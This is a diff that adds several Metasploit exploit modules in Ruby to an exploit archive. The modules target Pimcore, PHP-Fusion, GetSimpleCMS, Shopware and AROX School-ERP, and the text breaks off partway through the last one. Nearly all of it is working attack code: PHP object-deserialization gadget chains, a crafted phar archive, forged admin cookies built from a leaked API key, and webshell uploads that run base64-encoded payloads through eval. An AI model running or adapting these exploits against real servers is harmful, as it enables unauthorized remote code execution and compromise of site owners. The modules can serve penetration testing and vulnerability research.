+  def print_version(version, build)
+    print_status("Pimcore version: #{version}")
+    print_status("Pimcore build: #{build}")
+  end
+
+  def assign_target(version)
+    if Gem::Version.new(version) >= Gem::Version.new('5.0.0') && Gem::Version.new(version) <= Gem::Version.new('5.6.6')
+      print_good("The target is vulnerable!")
+      return targets[0]
+    elsif Gem::Version.new(version) >= Gem::Version.new('4.0.0') && Gem::Version.new(version) <= Gem::Version.new('4.6.5')
+      print_good("The target is vulnerable!")
+      return targets[1]
+    else
+      print_error("The target is NOT vulnerable!")
+      return nil
+    end
+  end
+
+  def upload
+    # JSON file payload
+    fpayload = "{\"customlayout\":[{\"creationDate\": \"#{rand(1..9)}\", \"modificationDate\": \"#{rand(1..9)}\", \"userOwner\": \"#{rand(1..9)}\", \"userModification\": \"#{rand(1..9)}\"}]}"
+    # construct POST data
+    data = Rex::MIME::Message.new
+    data.add_part(fpayload, 'application/json', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(3..9)}.json\"")
+
+    # send JSON file payload to bulk-import function
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'class', 'bulk-import'),
+      'vars_get' => { 'csrfToken' => @csrf_token },
+      'cookie' => @pimcore_cookies,
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data.to_s
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    if res.code == 200
+      json = res.get_json_document
+      if json['success'] == true
+        print_good("JSON payload uploaded successfully: #{json['filename']}")
+        return json['filename']
+      else
+        print_warning('Could not determine JSON payload file upload')
+        return nil
+      end
+    end
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login')
+    )
+
+    unless res
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res.code == 200 && res.headers =~ /pimcore/i || res.body =~ /pimcore/i
+      return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    # Try to log in, grab csrfToken and select target
+    my_target = login
+    if my_target.nil?
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+
+    # Try to upload JSON payload file
+    fname = upload
+
+    unless fname.nil?
+      # Register uploaded JSON payload file for cleanup
+      register_files_for_cleanup(fname)
+    end
+
+    print_status("Selected payload: #{my_target.name}")
+
+    case my_target['type']
+    when :symfony
+      # The payload to execute
+      spayload = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
+
+      # The Symfony object payload
+      serialize = "O:43:\"Symfony\\Component\\Cache\\Adapter\\ApcuAdapter\":3:{"
+      serialize << "s:64:\"\x00Symfony\\Component\\Cache\\Adapter\\AbstractAdapter\x00mergeByLifetime\";"
+      serialize << "s:9:\"proc_open\";"
+      serialize << "s:58:\"\x00Symfony\\Component\\Cache\\Adapter\\AbstractAdapter\x00namespace\";a:0:{}"
+      serialize << "s:57:\"\x00Symfony\\Component\\Cache\\Adapter\\AbstractAdapter\x00deferred\";"
+      serialize << "s:#{spayload.length}:\"#{spayload}\";}"
+    when :zend
+      # The payload to execute
+      spayload = "eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"
+
+      # The Zend1 object payload
+      serialize = "a:2:{i:7;O:8:\"Zend_Log\":1:{s:11:\"\x00*\x00_writers\";a:1:{"
+      serialize << "i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\x00*\00_eventsToMail\";a:1:{"
+      serialize << "i:0;i:1;}s:22:\"\x00*\x00_layoutEventsToMail\";a:0:{}s:8:\"\00*\x00_mail\";"
+      serialize << "O:9:\"Zend_Mail\":0:{}s:10:\"\x00*\x00_layout\";O:11:\"Zend_Layout\":3:{"
+      serialize << "s:13:\"\x00*\x00_inflector\";O:23:\"Zend_Filter_PregReplace\":2:{"
+      serialize << "s:16:\"\x00*\x00_matchPattern\";s:7:\"/(.*)/e\";s:15:\"\x00*\x00_replacement\";"
+      serialize << "S:#{spayload.length}:\"#{spayload}\";}"
+      serialize << "s:20:\"\x00*\x00_inflectorEnabled\";b:1;s:10:\"\x00*\x00_layout\";"
+      serialize << "s:6:\"layout\";}s:22:\"\x00*\x00_subjectPrependText\";N;}}};i:7;i:7;}"
+    end
+
+    # send serialized payload
+    send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri, 'admin', 'class', 'bulk-commit'),
+        'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
+        'cookie' => @pimcore_cookies,
+        'vars_post' => {
+          'filename' => fname,
+          'data' => JSON.generate(
+            'type' => 'customlayout',
+            'name' => serialize
+          )
+        },
+        'headers' => {
+          'X-pimcore-csrf-token' => @csrf_token
+        }
+      }, 30
+    )
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/remote/46839.rb b/exploits/php/remote/46839.rb
new file mode 100755
index 000000000..034dbe352
--- /dev/null
+++ b/exploits/php/remote/46839.rb
@@ -0,0 +1,207 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+ 
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "PHP-Fusion < 9.03.00 - 'Edit Profile' Remote Code Execution",
+      'Description' => %q(
+        This module exploits command execution vulnerability in PHP-Fusion 9.03.00 and prior versions.
+        It is possible to execute commands in the system with ordinary user authority. No need admin privilage.
+        There is almost no control in the avatar upload section in the profile edit area.
+        Only a client-based control working with javascript. (Simple pre-check)
+        If we do not care about this control, the desired file can be sent to the server via Interception-Proxies. 
+        The module opens the meterpreter session for you by bypassing the controls.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
+        ],
+      'References' =>
+        [
+          ['URL', 'http://www.pentest.com.tr/exploits/PHP-Fusion-9-03-00-Edit-Profile-Remote-Code-Execution.html'], # Details
+          ['URL', 'https://www.php-fusion.co.uk'],
+          ['URL', 'https://github.com/php-fusion/PHP-Fusion/commit/943432028b9e674433bb3f2a128b2477134110e6']
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' => [['Automatic', {}]],
+      'Privileged' => false,
+      'DisclosureDate' => "May 11 2019",
+      'DefaultTarget' => 0))
+ 
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base PHP-Fusion directory path", '/']),
+        OptString.new('USERNAME', [true, "Username to authenticate with", '']),
+        OptString.new('PASSWORD', [true, "Password to authenticate with", ''])
+      ]
+    )
+  end
+
+  def exec
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "images","avatars", "#{@shell}") # shell url
+    })
+  end
+##
+# Login and cookie information gathering
+##
+  def login(uname, pass, check)
+    # 1st request to get fusion_token 
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "home.php")
+    })
+
+    cookie = res.get_cookies
+    @fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]
+    # 2nd request to login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'home.php'),
+      'cookie'   => cookie,
+      'vars_post' => {
+        'fusion_token' => @fustoken,
+        'form_id' => 'loginform',
+        'user_name' => uname,
+        'user_pass' => pass,
+        'login' => ''
+      }
+    )
+
+    cookie = res.get_cookies
+    location = res.redirection.to_s
+    if res && res.code == 302 && location.include?('login.php?error')
+      fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}")
+    else
+      return cookie
+    end
+
+    return nil
+  end
+##
+# Upload malicious file // payload integration
+##
+  def upload_shell(cookie, check)
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "edit_profile.php"),
+      'cookie'   => cookie
+    })
+
+    ncookie = cookie + " " + res.get_cookies # gathering all cookie information
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "edit_profile.php"),
+      'cookie'   => ncookie
+    })
+
+    # fetch some necessary post data informations
+    fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]
+    userid = res.body.split("profile.php?lookup=")[1].split('"><i class=')[0]
+    userhash = res.body.split("userhash' value='")[1].split("' style")[0]
+    usermail = res.body.split("user_email' value='")[1].split("' >")[0]
+
+    # data preparation to delete priv avatar
+    delete = Rex::MIME::Message.new
+    delete.add_part("#{fustoken}", nil, nil, 'form-data; name="fusion_token"')
+    delete.add_part('userfieldsform', nil, nil, 'form-data; name="form_id"')
+    delete.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="user_name"')
+    delete.add_part("#{usermail}", nil, nil, 'form-data; name="user_email"')
+    delete.add_part('1', nil, nil, 'form-data; name="delAvatar"')
+    delete.add_part("#{userid}", nil, nil, 'form-data; name="user_id"')
+    delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
+    delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
+    delete.add_part('Update Profile', nil, nil, 'form-data; name="update_profile"')
+    deld = delete.to_s
+
+    res = send_request_cgi({
+      'method' => 'POST',    
+      'data'  => deld,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{delete.bound}",
+      'cookie' => ncookie,
+      'uri' => normalize_uri(target_uri.path, "edit_profile.php")     
+    })
+    # priv avatar deleted.
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "edit_profile.php"),
+      'cookie'   => cookie
+    })
+
+    ncookie = cookie + " " + res.get_cookies # recheck cookies
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "edit_profile.php"),
+      'cookie'   => ncookie
+    })
+
+    # They changed. fetch again...
+    fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]
+    userid = res.body.split("profile.php?lookup=")[1].split('"><i class=')[0]
+    userhash = res.body.split("userhash' value='")[1].split("' style")[0]
+    usermail = res.body.split("user_email' value='")[1].split("' >")[0]
+    # The "php" string must be removed for bypass.We can use "<?"
+    pay = payload.encoded.split("/**/")[1]
+    fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
+    @shell = "#{fname}"
+    # data preparation to upload new avatar
+    pdata = Rex::MIME::Message.new
+    pdata.add_part("#{fustoken}", nil, nil, 'form-data; name="fusion_token"')
+    pdata.add_part('userfieldsform', nil, nil, 'form-data; name="form_id"')
+    pdata.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="user_name"')
+    pdata.add_part("#{usermail}", nil, nil, 'form-data; name="user_email"')
+    pdata.add_part('1', nil, nil, 'form-data; name="delAvatar"')
+    pdata.add_part("<?" + pay, 'image/png', nil, "form-data; name=\"user_avatar\"; filename=\"#{fname}\"")
+    pdata.add_part("#{userid}", nil, nil, 'form-data; name="user_id"')
+    pdata.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
+    pdata.add_part('Update Profile', nil, nil, 'form-data; name="update_profile"')
+    data = pdata.to_s
+
+    res = send_request_cgi({
+      'method' => 'POST',    
+      'data'  => data,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
+      'cookie' => ncookie,
+      'uri' => normalize_uri(target_uri.path, "edit_profile.php")     
+    })
+
+    location = res.redirection.to_s
+    if res && res.code == 302 && location.include?('error')
+      fail_with(Failure::NoAccess, 'Error occurred during uploading!')
+    else
+      print_status("Trying to upload #{fname}")
+      return true
+    end
+   
+  end
+##
+# Exploit controls and information
+##
+  def exploit
+    cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
+    print_good("Authentication was successful with user: #{datastore['USERNAME']}")
+      
+    if upload_shell(cookie, true)
+      print_good("Control was bypassed. Harmful file upload successfully!")
+      exec
+    end
+  end
+##
+# The end of the adventure (o_O) // AkkuS
+##
+end
\ No newline at end of file
diff --git a/exploits/php/remote/46880.rb b/exploits/php/remote/46880.rb
new file mode 100755
index 000000000..f3cd41802
--- /dev/null
+++ b/exploits/php/remote/46880.rb
@@ -0,0 +1,178 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "GetSimpleCMS Unauthenticated RCE",
+      'Description'    => %q{
+        This module exploits a vulnerability found in GetSimpleCMS,
+        which allows unauthenticated attackers to perform Remote Code Execution.
+        An arbitrary file upload (PHPcode for example) vulnerability can be triggered by an authenticated user,
+        however authentication can be bypassed by leaking the cms API key to target the session manager.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'truerand0m' #  Discovery, exploit and Metasploit from Khalifazo,incite_team
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-11231'],
+          ['URL', 'https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution'],
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['GetSimpleCMS 3.3.15 and before', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 28 2019",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the cms', '/'])
+      ])
+  end
+
+  def gscms_version
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => normalize_uri(target_uri.path, 'admin', '/')
+      )
+      return unless res && res.code == 200
+
+      generator = res.get_html_document.at(
+        '//script[@type = "text/javascript"]/@src'
+        )
+
+      fail_with(Failure::NotFound, 'Failed to retrieve generator') unless generator
+      vers = generator.value.split('?v=').last.gsub(".","")
+      return unless vers
+      @version = vers
+  end
+
+  def get_salt
+    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+    return unless res && res.code == 200
+
+    fail_with(Failure::NotFound, 'Failed to retrieve salt') if res.get_xml_document.at('apikey').nil?
+    @salt = res.get_xml_document.at('apikey').text
+  end
+
+  def get_user
+    uri = normalize_uri(target_uri.path, 'data', 'users' ,'/')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+    return unless res && res.code == 200
+
+    fail_with(Failure::NotFound, 'Failed to retrieve username') if res.get_html_document.at('[text()*="xml"]').nil?
+    @username = res.get_html_document.at('[text()*="xml"]').text.split('.xml').first
+  end
+
+  def gen_cookie(version,salt,username)
+    cookie_name = "getsimple_cookie_#{version}"
+    sha_salt_usr = Digest::SHA1.hexdigest("#{username}#{salt}")
+
+    sha_salt_cookie = Digest::SHA1.hexdigest("#{cookie_name}#{salt}")
+    @cookie = "GS_ADMIN_USERNAME=#{username};#{sha_salt_cookie}=#{sha_salt_usr}"
+  end
+  def get_nonce(cookie)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri,'admin','theme-edit.php'),
+      'cookie' =>  cookie,
+      'vars_get' => {
+          't' => 'Innovation',
+          'f' => 'Default Template',
+          's' => 'Edit'
+      }
+    })
+
+    fail_with(Failure::NotFound, 'Failed to retrieve nonce') if res.get_html_document.at('//input[@id = "nonce"]/@value').nil?
+    @nonce = res.get_html_document.at('//input[@id = "nonce"]/@value')
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+        fail_with(Failure::NotVulnerable, 'It appears that the target is not vulnerable')
+    end
+    version = gscms_version
+    salt = get_salt
+    username = get_user
+    cookie = gen_cookie(version,salt,username)
+    nonce = get_nonce(cookie)
+
+    fname = "#{rand_text_alpha(6..16)}.php"
+    php   = %Q|<?php #{payload.encoded} ?>|
+    upload_file(cookie,nonce,fname,php)
+    send_request_cgi({
+        'method' => 'GET',
+        'uri'    => normalize_uri(target_uri.path,'theme',fname),
+    })
+  end
+
+  def check
+    version = gscms_version
+    unless version
+        return CheckCode::Safe
+    end
+    vprint_status "GetSimpleCMS version #{version}"
+    unless vulnerable
+        return CheckCode::Detected
+    end
+    CheckCode::Vulnerable
+  end
+
+  def vulnerable
+    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+    return unless res && res.code == 200
+
+    uri = normalize_uri(target_uri.path, 'data', 'users', '/')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+    return unless res && res.code == 200
+    return true
+  end
+
+  def upload_file(cookie,nonce,fname,content)
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path,'admin','theme-edit.php'),
+      'cookie'    => cookie,
+      'vars_post' => {
+        'submitsave'    => 2,
+        'edited_file' => fname,
+        'content' => content,
+        'nonce' => nonce
+      }
+    })
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/remote/46915.rb b/exploits/php/remote/46915.rb
new file mode 100755
index 000000000..e520fb969
--- /dev/null
+++ b/exploits/php/remote/46915.rb
@@ -0,0 +1,282 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "Shopware createInstanceFromNamedArguments PHP Object Instantiation RCE",
+      'Description' => %q(
+        This module exploits a php object instantiation vulnerability that can lead to RCE in
+        Shopware. An authenticated backend user could exploit the vulnerability.
+
+        The vulnerability exists in the createInstanceFromNamedArguments function, where the code
+        insufficiently performs whitelist check which can be bypassed to trigger an object injection.
+
+        An attacker can leverage this to deserialize an arbitrary payload and write a webshell to
+        the target system, resulting in remote code execution.
+
+        Tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Karim Ouerghemmi',               # original discovery
+          'mr_me <steven@srcincite.io>',    # patch bypass, rce & msf module
+        ],
+      'References' =>
+        [
+          ['CVE', '2017-18357'],                                                                         # not really because we bypassed this patch
+          ['URL', 'https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/']      # initial writeup w/ limited exploitation
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' => [['Automatic', {}]],
+      'Privileged' => false,
+      'DisclosureDate' => "May 09 2019",
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base Shopware path", '/']),
+        OptString.new('USERNAME', [true, "Backend username to authenticate with", 'demo']),
+        OptString.new('PASSWORD', [false, "Backend password to authenticate with", 'demo'])
+      ]
+    )
+  end
+
+  def do_login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'Login', 'login'),
+      'vars_post' => {
+        'username' => datastore['username'],
+        'password' => datastore['password'],
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200
+      cookie = res.get_cookies.scan(%r{(SHOPWAREBACKEND=.{26};)}).flatten.first
+      if res.nil?
+        return
+      end
+      return cookie
+    end
+    return
+  end
+
+  def get_webroot(cookie)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'systeminfo', 'info'),
+      'cookie' => cookie
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200
+      return res.body.scan(%r{DOCUMENT_ROOT </td><td class="v">(.*) </td></tr>}).flatten.first
+    end
+    return
+  end
+
+  def leak_csrf(cookie)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'CSRFToken', 'generate'),
+      'cookie' => cookie
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200
+      if res.headers.include?('X-Csrf-Token')
+        return res.headers['X-Csrf-Token']
+      end
+    end
+    return
+  end
+
+  def generate_phar(webroot)
+    php = Rex::FileUtils.normalize_unix_path("#{webroot}#{target_uri.path}media/#{@shll_bd}.php")
+    register_file_for_cleanup("#{@shll_bd}.php")
+    pop  = "O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":2:{s:41:\"\x00GuzzleHttp\\Cookie\\FileCookieJar\x00filename\";"
+    pop << "s:#{php.length}:\"#{php}\";"
+    pop << "s:36:\"\x00GuzzleHttp\\Cookie\\CookieJar\x00cookies\";"
+    pop << "a:1:{i:0;O:27:\"GuzzleHttp\\Cookie\\SetCookie\":1:{s:33:\"\x00GuzzleHttp\\Cookie\\SetCookie\x00data\";"
+    pop << "a:3:{s:5:\"Value\";"
+    pop << "s:48:\"<?php eval(base64_decode($_SERVER[HTTP_#{@header}])); ?>\";"
+    pop << "s:7:\"Expires\";"
+    pop << "b:1;"
+    pop << "s:7:\"Discard\";"
+    pop << "b:0;}}}}"
+    file          = Rex::Text.rand_text_alpha_lower(8)
+    stub          = "<?php __HALT_COMPILER(); ?>\r\n"
+    file_contents = Rex::Text.rand_text_alpha_lower(20)
+    file_crc32    = Zlib::crc32(file_contents) & 0xffffffff
+    manifest_len  = 40 + pop.length + file.length
+    phar  = stub
+    phar << [manifest_len].pack('V')              # length of manifest in bytes
+    phar << [0x1].pack('V')                       # number of files in the phar
+    phar << [0x11].pack('v')                      # api version of the phar manifest
+    phar << [0x10000].pack('V')                   # global phar bitmapped flags
+    phar << [0x0].pack('V')                       # length of phar alias
+    phar << [pop.length].pack('V')                # length of phar metadata
+    phar << pop                                   # pop chain
+    phar << [file.length].pack('V')               # length of filename in the archive
+    phar << file                                  # filename
+    phar << [file_contents.length].pack('V')      # length of the uncompressed file contents
+    phar << [0x0].pack('V')                       # unix timestamp of file set to Jan 01 1970.
+    phar << [file_contents.length].pack('V')      # length of the compressed file contents
+    phar << [file_crc32].pack('V')                # crc32 checksum of un-compressed file contents
+    phar << [0x1b6].pack('V')                     # bit-mapped file-specific flags
+    phar << [0x0].pack('V')                       # serialized File Meta-data length
+    phar << file_contents                         # serialized File Meta-data
+    phar << [Rex::Text.sha1(phar)].pack('H*')     # signature
+    phar << [0x2].pack('V')                       # signiture type
+    phar << "GBMB"                                # signature presence
+    return phar
+  end
+
+  def upload(cookie, csrf_token, phar)
+    data = Rex::MIME::Message.new
+    data.add_part(phar, Rex::Text.rand_text_alpha_lower(8), nil, "name=\"fileId\"; filename=\"#{@phar_bd}.jpg\"")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'backend', 'mediaManager', 'upload'),
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data.to_s,
+      'cookie' => cookie,
+      'headers' => {
+        'X-CSRF-Token' => csrf_token
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200 && res.body =~ /Image is not in a recognized format/i
+      return true
+    end
+    return
+  end
+
+  def leak_upload(cookie, csrf_token)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'MediaManager', 'getAlbumMedia'),
+      'cookie' => cookie,
+      'headers' => {
+        'X-CSRF-Token' => csrf_token
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200 && res.body =~ /#{@phar_bd}.jpg/i
+      bd_path = $1 if res.body =~ /media\\\/image\\\/(.{10})\\\/#{@phar_bd}/
+      register_file_for_cleanup("image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg")
+      return "media/image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg"
+    end
+    return
+  end
+
+  def trigger_bug(cookie, csrf_token, upload_path)
+    sort = {
+      "Shopware_Components_CsvIterator" => {
+        "filename" => "phar://#{upload_path}",
+        "delimiter" => "",
+        "header" => ""
+      }
+    }
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),
+      'cookie' => cookie,
+      'headers' => {
+        'X-CSRF-Token' => csrf_token
+      },
+      'vars_get' => { 'sort' => sort.to_json }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    return
+  end
+
+  def exec_code
+    send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "media", "#{@shll_bd}.php"),
+      'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
+    }, 1)
+  end
+
+  def check
+    cookie = do_login
+    if cookie.nil?
+      vprint_error "Authentication was unsuccessful"
+      return Exploit::CheckCode::Safe
+    end
+    csrf_token = leak_csrf(cookie)
+    if csrf_token.nil?
+      vprint_error "Unable to leak the CSRF token"
+      return Exploit::CheckCode::Safe
+    end
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),
+      'cookie' => cookie,
+      'headers' => { 'X-CSRF-Token' => csrf_token }
+    )
+    if res.code == 200 && res.body =~ /Shop not found/i
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+    @phar_bd  = Rex::Text.rand_text_alpha_lower(8)
+    @shll_bd  = Rex::Text.rand_text_alpha_lower(8)
+    @header   = Rex::Text.rand_text_alpha_upper(2)
+    cookie = do_login
+    if cookie.nil?
+      fail_with(Failure::NoAccess, "Authentication was unsuccessful")
+    end
+    print_good("Stage 1 - logged in with #{datastore['username']}: #{cookie}")
+    web_root = get_webroot(cookie)
+    if web_root.nil?
+      fail_with(Failure::Unknown, "Unable to leak the webroot")
+    end
+    print_good("Stage 2 - leaked the web root: #{web_root}")
+    csrf_token = leak_csrf(cookie)
+    if csrf_token.nil?
+      fail_with(Failure::Unknown, "Unable to leak the CSRF token")
+    end
+    print_good("Stage 3 - leaked the CSRF token: #{csrf_token}")
+    phar = generate_phar(web_root)
+    print_good("Stage 4 - generated our phar")
+    if !upload(cookie, csrf_token, phar)
+      fail_with(Failure::Unknown, "Unable to upload phar archive")
+    end
+    print_good("Stage 5 - uploaded phar")
+    upload_path = leak_upload(cookie, csrf_token)
+    if upload_path.nil?
+      fail_with(Failure::Unknown, "Cannot find phar archive")
+    end
+    print_good("Stage 6 - leaked phar location: #{upload_path}")
+    trigger_bug(cookie, csrf_token, upload_path)
+    print_good("Stage 7 - triggered object instantiation!")
+    exec_code
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/remote/46999.rb b/exploits/php/remote/46999.rb
new file mode 100755
index 000000000..ae96889d9
--- /dev/null
+++ b/exploits/php/remote/46999.rb
@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "AROX School-ERP Pro Unauthenticated Remote Code Execution",
+      'Description' => %q(
+        This module exploits a command execution vulnerability in AROX School-ERP.
+        "import_stud.php" and "upload_fille.php" do not have session control. 
+        Session start/check functions in Line 8,9,10 are disabled with slashes.
+        Therefore an unathenticated user can execute the command on the system.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
+        ],
+      'References' =>
+        [
+          ['URL', 'http://www.pentest.com.tr/exploits/AROX-School-ERP-Pro-Unauthenticated-RCE-Metasploit.html'],
+          ['URL', 'https://sourceforge.net/projects/school-erp-ultimate/'] # Download
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' => [['Automatic', {}]],
+      'Privileged' => false,
+      'DisclosureDate' => "Jun 17 2019",
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base ERP directory path", '/'])
+      ]
+    )
+  end
+
+  def exec(shell)
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_data", "#{shell}") # shell url
+    })
+  end
+
+  def upload_shell(check)
+
+    fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
+    @shell = "#{fname}"
+    pdata = Rex::MIME::Message.new
+    pdata.add_part("" + payload.encoded, 'application/octet-stream', nil, "form-data; name=\"txtdocname\"; filename=\"#{fname}\"")
+    pdata.add_part('Submit', nil, nil, 'form-data; name="btnsubmit"')
+    data = pdata.to_s
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'data'  => data,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
+      'uri' => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_fille.php")
+    })
+
+    if res && res.code == 200 && res.body =~ /Successfully/
+      print_status("Trying to upload #{fname}")
+      return true
+    else
+      fail_with(Failure::NoAccess, 'Error occurred during uploading!')
+      return false
+    end
+  end
+
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
